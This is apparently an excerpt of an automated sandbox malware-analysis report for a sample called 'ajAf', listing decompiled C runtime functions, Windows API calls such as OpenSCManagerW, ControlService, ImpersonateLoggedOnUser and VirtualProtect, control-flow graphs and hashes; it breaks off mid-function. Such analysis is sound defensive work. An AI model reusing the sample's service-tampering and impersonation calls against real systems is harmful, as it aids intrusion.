                                                          0x0040b6fb
                                                          0x0040b700
                                                          0x0040b704
                                                          0x0040b706
                                                          0x0040b715
                                                          0x0040b723
                                                          0x0040b725
                                                          0x0040b727
                                                          0x0040b73a
                                                          0x0040b73c
                                                          0x0040b725
                                                          0x0040b704
                                                          0x0040b6cf
                                                          0x0040b742
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040af7b
                                                          0x0040af8b
                                                          0x00000000

                                                          APIs
                                                          • _malloc.LIBCMT ref: 0040AF80
                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1411284514-0
                                                          • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                          • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 277 1fc0e0f-1fc0e24 SetErrorMode * 2 278 1fc0e2b-1fc0e2c 277->278 279 1fc0e26 277->279 279->278
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,01FC0223,?,?), ref: 01FC0E19
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,01FC0223,?,?), ref: 01FC0E1E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction ID: e45c7faabf02746cd53b9cede99ea59c82e8191441bed3878c85bfa3d8cc56a1
                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction Fuzzy Hash: 1ED01235545129B7D7003A94DC09BCD7F1CDF05B62F008011FB0DD9080CB7195414AE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 280 40e7ee-40e7f6 call 40e7c3 282 40e7fb-40e7ff ExitProcess 280->282
                                                          C-Code - Quality: 100%
                                                          			E0040E7EE(int _a4) {
                                                          
                                                          				E0040E7C3(_a4); // executed
                                                          				ExitProcess(_a4);
                                                          			}



                                                          0x0040e7f6
                                                          0x0040e7ff

                                                          APIs
                                                          • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                            • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                            • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                            • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                          • ExitProcess.KERNEL32 ref: 0040E7FF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                          • String ID:
                                                          • API String ID: 2427264223-0
                                                          • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                          • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                          • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                          • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 361 22399e8-2239a49 363 2239a82-2239ad2 OpenServiceA 361->363 364 2239a4b-2239a55 361->364 369 2239ad4-2239ada 363->369 370 2239adb-2239b0c 363->370 364->363 365 2239a57-2239a59 364->365 367 2239a5b-2239a65 365->367 368 2239a7c-2239a7f 365->368 371 2239a67 367->371 372 2239a69-2239a78 367->372 368->363 369->370 376 2239b0e-2239b12 370->376 377 2239b1c 370->377 371->372 372->372 373 2239a7a 372->373 373->368 376->377 378 2239b14 376->378 378->377
                                                          APIs
                                                          • OpenServiceA.ADVAPI32(?,?,?), ref: 02239AC2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: OpenService
                                                          • String ID:
                                                          • API String ID: 3098006287-0
                                                          • Opcode ID: 5cb790d8353a5fbab62be00a5632ab674b6db202c1e22d3d6694dd08ae66a079
                                                          • Instruction ID: 47089ff2b15017263e4a59ab9ab9092ae968e3edce6958a113206a9427598792
                                                          • Opcode Fuzzy Hash: 5cb790d8353a5fbab62be00a5632ab674b6db202c1e22d3d6694dd08ae66a079
                                                          • Instruction Fuzzy Hash: 8C3145B1D102098FDB11CFE9C885B9EBBF1BF49704F148629E815AB244D7B99881CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 379 2239920-223996f 381 2239971-2239974 379->381 382 2239977-223997b 379->382 381->382 383 2239983-22399b2 OpenSCManagerW 382->383 384 223997d-2239980 382->384 385 22399b4-22399ba 383->385 386 22399bb-22399cf 383->386 384->383 385->386
                                                          APIs
                                                          • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 022399A5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          • Opcode ID: 3f5132f68adfb4e6b06e93d54885ae843ef5b40dbeef03e1cfe0ffaa7fa16ae0
                                                          • Instruction ID: d7acb8066e89a18dac2ea0a9895baf916ddae5430303cae338e2aaa5331aa2fe
                                                          • Opcode Fuzzy Hash: 3f5132f68adfb4e6b06e93d54885ae843ef5b40dbeef03e1cfe0ffaa7fa16ae0
                                                          • Instruction Fuzzy Hash: ED2135B5C002098FCB20CF99D884BDEFBF4FF89714F10851AD808AB204C7759540CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 388 2239180-2239201 VirtualProtect 391 2239203-2239209 388->391 392 223920a-223922f 388->392 391->392
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022391F4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: e3fcbb06ae81f5c0049bee0e3d058033293b6574906b04592b070c5e9967cd61
                                                          • Instruction ID: 7a0bb23a3c1081bf7b0b9c0a75d613bed3d8d4097b633deddf94414895276b63
                                                          • Opcode Fuzzy Hash: e3fcbb06ae81f5c0049bee0e3d058033293b6574906b04592b070c5e9967cd61
                                                          • Instruction Fuzzy Hash: 7411E3B1D002499FDB10DFAAC884AEFFBF4FF48310F50842AE419A7250C779A9448FA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 396 223a0e8-223a165 ControlService 398 223a167-223a16d 396->398 399 223a16e-223a18f 396->399 398->399
                                                          APIs
                                                          • ControlService.ADVAPI32(?,?,?), ref: 0223A158
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ControlService
                                                          • String ID:
                                                          • API String ID: 253159669-0
                                                          • Opcode ID: bca99899f7d6e463a4130bf6d8154c9a901c5f1671f826e725bfe5eb02255229
                                                          • Instruction ID: 6921e4c7b862c99d1a836fb803dcdbae6c252bc560c335d74d58e065fcbde68d
                                                          • Opcode Fuzzy Hash: bca99899f7d6e463a4130bf6d8154c9a901c5f1671f826e725bfe5eb02255229
                                                          • Instruction Fuzzy Hash: 2711E4B1D006099FDB10CF9AC984BDEFBF4EB48310F108429E559A7250D379A945CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 401 2239ed8-2239f44 ImpersonateLoggedOnUser 403 2239f46-2239f4c 401->403 404 2239f4d-2239f6e 401->404 403->404
                                                          APIs
                                                          • ImpersonateLoggedOnUser.KERNELBASE ref: 02239F37
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ImpersonateLoggedUser
                                                          • String ID:
                                                          • API String ID: 2216092060-0
                                                          • Opcode ID: 7b7e89efb9bc3975a84b00fb7782188eac0698229c32850b9f6d1ffd01fde2d0
                                                          • Instruction ID: 04dd1e0cb5d84e0da44cdab464b595739ad5e7207d06088cd46ca57cc71b6d27
                                                          • Opcode Fuzzy Hash: 7b7e89efb9bc3975a84b00fb7782188eac0698229c32850b9f6d1ffd01fde2d0
                                                          • Instruction Fuzzy Hash: EF1145B1900209CFDB20CF9AC984BDEFBF4EF49324F10846AD418A3240C779A984CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 485 40d534-40d556 HeapCreate 486 40d558-40d559 485->486 487 40d55a-40d563 485->487
                                                          C-Code - Quality: 100%
                                                          			E0040D534(intOrPtr _a4) {
                                                          				void* _t6;
                                                          
                                                          				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                          				 *0x4234b4 = _t6;
                                                          				if(_t6 != 0) {
                                                          					 *0x4250b0 = 1;
                                                          					return 1;
                                                          				} else {
                                                          					return _t6;
                                                          				}
                                                          			}




                                                          0x0040d549
                                                          0x0040d54f
                                                          0x0040d556
                                                          0x0040d55d
                                                          0x0040d563
                                                          0x0040d559
                                                          0x0040d559
                                                          0x0040d559

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                          • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                          • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                          • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 488 40ea0a-40ea16 call 40e8de 490 40ea1b-40ea1f 488->490
                                                          C-Code - Quality: 25%
                                                          			E0040EA0A(intOrPtr _a4) {
                                                          				void* __ebp;
                                                          				void* _t2;
                                                          				void* _t3;
                                                          				void* _t4;
                                                          				void* _t5;
                                                          				void* _t8;
                                                          
                                                          				_push(0);
                                                          				_push(0);
                                                          				_push(_a4);
                                                          				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                          				return _t2;
                                                          			}









                                                          0x0040ea0f
                                                          0x0040ea11
                                                          0x0040ea13
                                                          0x0040ea16
                                                          0x0040ea1f

                                                          APIs
                                                          • _doexit.LIBCMT ref: 0040EA16
                                                            • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __decode_pointer$__initterm$__lock_doexit
                                                          • String ID:
                                                          • API String ID: 1597249276-0
                                                          • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                          • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                          • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                          • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 01FC0929
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessTerminate
                                                          • String ID:
                                                          • API String ID: 560597551-0
                                                          • Opcode ID: cd6e8b06e9fc6daff329b0075f01cd6e00680555ed9156381d0d7b778eb813a9
                                                          • Instruction ID: 3e9c807a23c100a99a722049cf7bfbcce58d99a4c5dbb09bf75c012b4819f226
                                                          • Opcode Fuzzy Hash: cd6e8b06e9fc6daff329b0075f01cd6e00680555ed9156381d0d7b778eb813a9
                                                          • Instruction Fuzzy Hash: D490047034435111DC703DFC0C01F0500013741730F7107107130FD5D5DC4055004157
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414527376.0000000001F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1f9d000_ajAf.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 201344983253fab17d62c57c28b1fedebe0257d03632891613f17915983f1acb
                                                          • Instruction ID: b4e70df78a12b33576b9bd73ee9fc0e633b2a40dc2b57d5ef624293c9fcd41d7
                                                          • Opcode Fuzzy Hash: 201344983253fab17d62c57c28b1fedebe0257d03632891613f17915983f1acb
                                                          • Instruction Fuzzy Hash: 7101F771908344EAFB115E59CC84B67BFD8EF817A4F28811AED4D1F25AC37A9805C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414527376.0000000001F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1f9d000_ajAf.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfc1a57616442b4668ee69d5549c6b30153dcb4b0f548eec930475f042193ada
                                                          • Instruction ID: ebb1d97daacd0f39783d5b615e19f0c61919f2a3d46835bab03e3de1bd1a5b92
                                                          • Opcode Fuzzy Hash: bfc1a57616442b4668ee69d5549c6b30153dcb4b0f548eec930475f042193ada
                                                          • Instruction Fuzzy Hash: 70011B6140D3C09FE7128B258894A52BFB4AF43264F1981DBD9889F2A7C26A5849C772
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                          				intOrPtr _v0;
                                                          				void* _v804;
                                                          				intOrPtr _v808;
                                                          				intOrPtr _v812;
                                                          				intOrPtr _t6;
                                                          				intOrPtr _t11;
                                                          				intOrPtr _t12;
                                                          				intOrPtr _t13;
                                                          				long _t17;
                                                          				intOrPtr _t21;
                                                          				intOrPtr _t22;
                                                          				intOrPtr _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr* _t31;
                                                          				void* _t34;
                                                          
                                                          				_t27 = __esi;
                                                          				_t26 = __edi;
                                                          				_t25 = __edx;
                                                          				_t22 = __ecx;
                                                          				_t21 = __ebx;
                                                          				_t6 = __eax;
                                                          				_t34 = _t22 -  *0x422234; // 0x99931ded
                                                          				if(_t34 == 0) {
                                                          					asm("repe ret");
                                                          				}
                                                          				 *0x423b98 = _t6;
                                                          				 *0x423b94 = _t22;
                                                          				 *0x423b90 = _t25;
                                                          				 *0x423b8c = _t21;
                                                          				 *0x423b88 = _t27;
                                                          				 *0x423b84 = _t26;
                                                          				 *0x423bb0 = ss;
                                                          				 *0x423ba4 = cs;
                                                          				 *0x423b80 = ds;
                                                          				 *0x423b7c = es;
                                                          				 *0x423b78 = fs;
                                                          				 *0x423b74 = gs;
                                                          				asm("pushfd");
                                                          				_pop( *0x423ba8);
                                                          				 *0x423b9c =  *_t31;
                                                          				 *0x423ba0 = _v0;
                                                          				 *0x423bac =  &_a4;
                                                          				 *0x423ae8 = 0x10001;
                                                          				_t11 =  *0x423ba0; // 0x0
                                                          				 *0x423a9c = _t11;
                                                          				 *0x423a90 = 0xc0000409;
                                                          				 *0x423a94 = 1;
                                                          				_t12 =  *0x422234; // 0x99931ded
                                                          				_v812 = _t12;
                                                          				_t13 =  *0x422238; // 0x666ce212
                                                          				_v808 = _t13;
                                                          				 *0x423ae0 = IsDebuggerPresent();
                                                          				_push(1);
                                                          				E004138FC(_t14);
                                                          				SetUnhandledExceptionFilter(0);
                                                          				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                          				if( *0x423ae0 == 0) {
                                                          					_push(1);
                                                          					E004138FC(_t17);
                                                          				}
                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                          			}



















                                                          0x0040ce09
                                                          0x0040ce09
                                                          0x0040ce09
                                                          0x0040ce09
                                                          0x0040ce09
                                                          0x0040ce09
                                                          0x0040ce09
                                                          0x0040ce0f
                                                          0x0040ce11
                                                          0x0040ce11
                                                          0x00413644
                                                          0x00413649
                                                          0x0041364f
                                                          0x00413655
                                                          0x0041365b
                                                          0x00413661
                                                          0x00413667
                                                          0x0041366e
                                                          0x00413675
                                                          0x0041367c
                                                          0x00413683
                                                          0x0041368a
                                                          0x00413691
                                                          0x00413692
                                                          0x0041369b
                                                          0x004136a3
                                                          0x004136ab
                                                          0x004136b6
                                                          0x004136c0
                                                          0x004136c5
                                                          0x004136ca
                                                          0x004136d4
                                                          0x004136de
                                                          0x004136e3
                                                          0x004136e9
                                                          0x004136ee
                                                          0x004136fa
                                                          0x004136ff
                                                          0x00413701
                                                          0x00413709
                                                          0x00413714
                                                          0x00413721
                                                          0x00413723
                                                          0x00413725
                                                          0x0041372a
                                                          0x0041373e

                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                          • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                          • String ID:
                                                          • API String ID: 2579439406-0
                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                          • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                          • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 01FD395B
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01FD3970
                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 01FD397B
                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 01FD3997
                                                          • TerminateProcess.KERNEL32(00000000), ref: 01FD399E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                          • String ID:
                                                          • API String ID: 2579439406-0
                                                          • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                          • Instruction ID: 559e21929527b71b305ae754741d131f0bda493f3804924c381606384c17b5c6
                                                          • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                          • Instruction Fuzzy Hash: F52103B9A01204EFD720DF68ED4A6557FB0FB08356F804079E50D87262E7B96682CF4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040ADB0(intOrPtr* __ecx) {
                                                          				void* _t5;
                                                          				intOrPtr* _t11;
                                                          
                                                          				_t11 = __ecx;
                                                          				_t5 =  *(__ecx + 8);
                                                          				 *__ecx = 0x41eff0;
                                                          				if(_t5 != 0) {
                                                          					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                          				}
                                                          				if( *(_t11 + 0xc) != 0) {
                                                          					_t5 = GetProcessHeap();
                                                          					if(_t5 != 0) {
                                                          						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                          					}
                                                          				}
                                                          				return _t5;
                                                          			}





                                                          0x0040adb3
                                                          0x0040adb5
                                                          0x0040adb8
                                                          0x0040adc0
                                                          0x0040adc8
                                                          0x0040adc8
                                                          0x0040adce
                                                          0x0040add0
                                                          0x0040add8
                                                          0x00000000
                                                          0x0040ade1
                                                          0x0040add8
                                                          0x0040ade8

                                                          APIs
                                                          • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$FreeProcess
                                                          • String ID:
                                                          • API String ID: 3859560861-0
                                                          • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                          • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                          • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                          • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                          • Instruction ID: dc0d814f1a9316f36193728ce97dad20cf3399229c0dd3362e6abad7ca9e928d
                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                          • Instruction Fuzzy Hash: E801F77AA00601CFDF22CF24C914BAE33E9EB85605F0940A8F50697242EB70A8429F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
